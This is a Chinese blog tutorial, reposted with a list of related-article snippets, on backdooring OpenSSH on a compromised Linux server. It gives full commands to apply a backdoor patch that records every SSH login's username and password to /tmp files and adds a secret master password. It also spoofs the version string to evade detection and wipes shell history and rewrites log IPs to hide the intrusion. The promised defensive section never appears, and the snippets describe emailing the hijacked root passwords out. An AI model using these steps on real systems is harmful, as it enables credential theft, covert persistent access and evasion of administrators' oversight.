利用Openssh后门 劫持root密码

最新推荐文章于 2024-09-13 09:49:50 发布
最新推荐文章于 2024-09-13 09:49:50 发布
阅读量361 收藏 2
点赞数
文章标签: 运维 开发工具 操作系统
原文链接:http://www.cnblogs.com/bigdevilking/p/9535427.html
版权

Linux操作系统的密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下,

可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门,

达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSSH留后门是入侵者的惯用方式之一,OpenSSh后门比较难于检测

那么怎么给添加OpenSSH后门以及防范后门呢

安装依赖包

[root@DaMoWang openssh-5.9p1]# yum -y install openssl openssl-devel pam-devel zlib zlib-devel

 

准备安装包

[root@DaMoWang ~]# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013
[root@DaMoWang ~]# ls /opt/
openssh-5.9p1.patch.tar.gz  openssh-5.9p1.tar.gz
# openssh-5.9p1.patch 是补丁文件

解压

[root@DaMoWang ~]# cd /opt/
[root@DaMoWang opt]# tar xf openssh-5.9p1.tar.gz 
[root@DaMoWang opt]# tar xf openssh-5.9p1.patch.tar.gz 
[root@DaMoWang opt]# ls
openssh-5.9p1  openssh-5.9p1.patch  openssh-5.9p1.patch.tar.gz  openssh-5.9p1.tar.gz

给openssh打补丁

[root@DaMoWang opt]# cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1
[root@DaMoWang opt]# which patch
/usr/bin/which: no patch in (/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin)
[root@DaMoWang opt]# yum install patch
[root@DaMoWang opt]# cd /opt/openssh-5.9p1
[root@DaMoWang openssh-5.9p1]# patch < sshbd5.9p1.diff   # 打补丁就是修改替换原文件
patching file auth.c
patching file auth-pam.c
patching file auth-passwd.c
patching file canohost.c
patching file includes.h
patching file log.c
patching file servconf.c
patching file sshconnect2.c
patching file sshlogin.c
patching file version.h

添加后门密码

[root@DaMoWang openssh-5.9p1]# vim includes.h 
# 跳转到配置文件末尾处 , 修改默认配置
#define ILOG "/tmp/ilog"    # 记录远程登录本机的用户和密码
#define OLOG "/tmp/olog"    # 记录本机远程登录到其他主机的用户和密码
#define SECRETPW "apaajaboleh"    # 后门密码

修改版本号

[root@DaMoWang openssh-5.9p1]# vim version.h 
# 修改为当前OpenSSH的版本号
#define SSH_VERSION     "OpenSSH_5.3"

#define SSH_PORTABLE    "p1"

编译安装

[root@DaMoWang openssh-5.9p1]# ./configure --prefix=/usr \
 --sysconfdir=/etc/ssh \
 --with-pam \
 --with-kerberos5 \
 && make && make install

 

可以看出来 安装的时候 , 已经把原有的ssh的所有命令全部替换 , 但是原有的配置文件并没有被替换 , 这样不容易被发现

重启ssh服务 测试一下

[root@DaMoWang openssh-5.9p1]# service sshd restart
停止 sshd:                                                [确定]
正在启动 sshd:                                            [确定]
[root@DaMoWang openssh-5.9p1]# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

服务正常启动 , 版本也与原版本一致

测试是否能劫持用户密码

首先测试远程登录本机

现在并没有生成文件

用xshell远程连接一下

 

 用户名和密码被劫持 , 不仅仅是root用户  , 所有远程连接本机的用户都会被记录 

测试后面密码能否登录本机

为了看到效果 使用明文密码登录

连接以后 别留下脚印

[root@DaMoWang ~]# export HISTFILE=/dev/null
[root@DaMoWang ~]# export HISTSIZE=0
[root@DaMoWang ~]# export HISTFILESIZE=0
[root@DaMoWang ~]# echo >/root/.bash_history # 这个是历史命令的终极文件 不能删除 , 如果原来有内容 , 不能清除 可以是用sed替换
[root@DaMoWang ~]# sed -i ‘s/192.168.94.66/127.0.0.1/g’ /root/.bash_history
# 其他访问日志也可以用用sed替换ip , 瞒天过海

 

转载于:https://www.cnblogs.com/bigdevilking/p/9535427.html

a790308
关注
自动劫持root密码
qq_40907977的博客
10-27 280
前言 1、暴力破解sshd服务密码 2、自动劫持root密码并转发密码到邮箱 实战 : 自动劫持root密码并转发密码到邮箱 1、自动劫持root密码 2、把存密码的文件转发到邮箱 上传软件 #rz 0x06-openssh-5.9p1.patch.tar.gz inotify-tools-3.13.tar.gz #rz openssh-5.9p1.tar.gz 解压 #tar -zxvf openssh-5.9p1.tar.gz #tar -zxvf 0x06-openssh-5.9p1.patch.t
自动劫持root密码并转发密码到邮箱
weixin_34234829的博客
11-05 318
自动劫持root密码并转发密码到邮箱 一:实验内容自动劫持root密码并转发密码到邮箱 二:劫持root密码的过程: 过程1:如上图所示。***登录到sshd服务系统之后会用***补丁文件将原来的sshd服务替换掉,并且留下后门密码,此后门密码还可以直接登录系统。  过程2:网络管理员登录到系统之后,所登录的路径已经不是原来真实安全的路径了,是由***替换掉的sshd服务和路径。在此登录之后,管理...
144-Linux权限维持&OpenSSH&PAM后门&SSH软链接&公私钥登录
DamnVanish的博客
08-30 1485
Linux中有关ssh方面的权限维持姿势
某ssh后门试用
weixin_30385925的博客
04-23 327
在获取linux的root权限之后,虽然可以ssh连进去,但是可否长期进行控制呢?这里就涉及到ssh后门的问题了。在这里,我大致试用了一下一个比较老但是稳定的ssh后门,算是作个记录。后续我会翻译一篇老外用python写的ssh后门。好了,我会在虚拟机中对ssh后门做一个演示,最后我会放出下载到的后门程序。 在这里,我使用安装的Kali1.1.0_32来进行试验。...
擂台赛-安全攻防之使用openssh后门获取root密码实战
低调,谦虚,自律,反思,成长,保持热爱,奔赴梦想
03-17 4126
安全从来无小事,防范意识勿放松,安全攻防之openssh后门获取root密码实战
OpenSSH后门从入门到应急响应与加固
最新发布
记录开发和安全学习过程中的点点滴滴
09-13 1008
当拿到root权限后,一般需要维持权限(留后门),可以创建一个openssh后门,也就是root密码,管理员一个密码,我们的后门一个密码OpenSSH 是 SSH(Secure Shell)协议的免费开源实现,它用于安全远程连接和计算机管理,通过加密技术保障通信安全。OpenSSH 的主要功能包括远程登录、命令执行、文件传输和端口转发等。它包含客户端和服务器两部分,客户端用于连接远程服务器,而服务器则在远程服务器上运行,接受客户端的连接请求。
实战-自动劫持root密码并转发密码到邮箱
晨!!!的博客
02-14 1588
实验环境:RHEL 6,在Centos7下无法实现 劫持root密码的过程 实验拓扑图: 思路:在zmedu63上安装一个打了后门补丁的sshd服务,当用户来连接时,直接把密码记录下来。然后使用脚本发给我们的邮箱中 1、查看ssh版本 ssh -v #查看安装前ssh版本 OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010 2、确认gcc是否已安...
SSH后门万能密码
墨鱼菜鸡
07-19 228
当我们在获得一台Linux服务器的 root 权限后,我们第一想做的就是如何维持这个权限,维持权限肯定想到的就是在目标服务器留下一个后门。但是留普通后门,肯定很容易被发现。我们今天要讲的就是留一个SSH后门,是通过修改SSH源代码的方式来留一个万能的SSH密码。 环境: 软件包准备: openss...
Root密码自动发送到邮箱
zsw07的博客
02-14 718
记一次服务器被当作肉鸡,服务器再一次被黑后,没有发生任何意外,管理员也就没当回事,没有太在意,也紧急修改了密码,但是过段时间后,服务器经常性的CPU飙高,总是会有一些莫名进程占用内存,杀掉进程,修改登录密码,发现过段时间后,还会出现这种情况,这是因为sshd已被修改,有后门,无论你怎样修改密码,黑客都会收到你的用户名和密码。今天,我们模拟劫持root密码并自动发送到指定邮箱 准备环境:Cento...
openssh-5.9p1后门打补丁版
08-08
openssh-5.9p1后门打补丁版
利用Openssh后门 劫持root密码
春风亭老王的博客
11-12 811
利用Openssh后门 劫持root密码 Linux操作系统密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门,达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSSH后门是入侵者的惯用方式之一,OpenSSh后门比较难于检测,那么怎么给添加OpenSSH后门以及防范后门呢? 安装依赖包 [root@DaMoWang
openssh_5.9后门入侵,你信吗?
afei001
11-12 637
后门SSH服务入侵 劫持原理:     替换原来系统上的sshd服务。实现:一个用户名root对应两个密码:一个正常密码,一个后门密码,而且后门密码不在passwd和shadow中。 1. 首先将需要的工具上传到服务器上 [root@client1 ~]# mkdir ssh-tools [root@client1 ~]# cd ssh-tools/ [root@client1 ssh-too...
红队渗透笔记之利用OpenSsh完成root劫持以及持久化利用
明光札记
12-05 925
下文将介绍如何使用OpenSsh完成; 1、root任意密码设置 2、将用户名与密码记录到log中 准备工作 1、明确ssh版本方便等将后续安装的openssh的版本号修改为原版本号 ssh -V 2、将原有ssh文件进行备份,方便一会为新安装的openssh同步时间属性 # 1、为了保存源文件的信息我们先做改名操作,后复制改名后的文件为源文件的样子(注意.bak文件保留着文件的原属性) mv /etc/ssh/ /etc/ssh.bak/ mv /usr/sbin/sshd /usr/sbin/.
linux 简单ssh后门,Linux OpenSSH后门的添加与防范
weixin_29276847的博客
05-12 523
03 还原新配置文件为旧配置文件的时间执行以下命令,使ssh_config和sshd_config文件的修改时间与ssh_config.old和sshd_config.old文件一致。touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_configtouch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config...
渗透linux的ssh,Linux系统安全之ssh后门
weixin_31559919的博客
05-12 218
1.ssh -V#查看当前的ssh版本信息#OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 20102.查找ssh的配置文件一般都在/etc/ssh中3.备份原来的文件的time将/etc/ssh下的文件的备份假设/etc/ssh/sshd_config 备份为/etc/ssh/sshd_config.old4.wget存在后门的ssh#http://core.i...
linux 简单ssh后门,Linux 安全之SSH后门
weixin_27310417的博客
05-12 322
一.查看SSH版本[root@redkey vmshare]# ssh -VOpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010二.下载SSH 源码包源码包:http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz后门文件:http://core.ipsecs.com/roo...
ssh后门介绍与防御
有勇气的牛排博客
08-04 1719
文章目录1 介绍2 实战演练2.1 查看版本2.2 下载SSH配置文件2.3 安装2.4 修改后门密码and文件记录2.5 编译安装2.6 摸出痕迹3 防御ssh后门 1 介绍 当拿到root权限后,一般需要维持权限(留后门),可以做openssh后门,也就是root密码,管理员一个密码,我们的后门一个密码。 2 实战演练 实验环境:Centos7 2.1 查看版本 ssh -v 可以对ssh备份配置文件,可以对后期的文件时间进行修改 cp -p /etc/ssh/ssh_config / etc/
Linux下利用openSSH创建隐秘后门教程
本文档介绍了如何在Linux系统中创建一个基于OpenSSH后门,用于系统安全...在生产环境中,应该始终保持OpenSSH的安全更新,并遵循最佳安全实践,例如限制权限、使用强密码和密钥、监控日志等,以防止此类后门的出现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值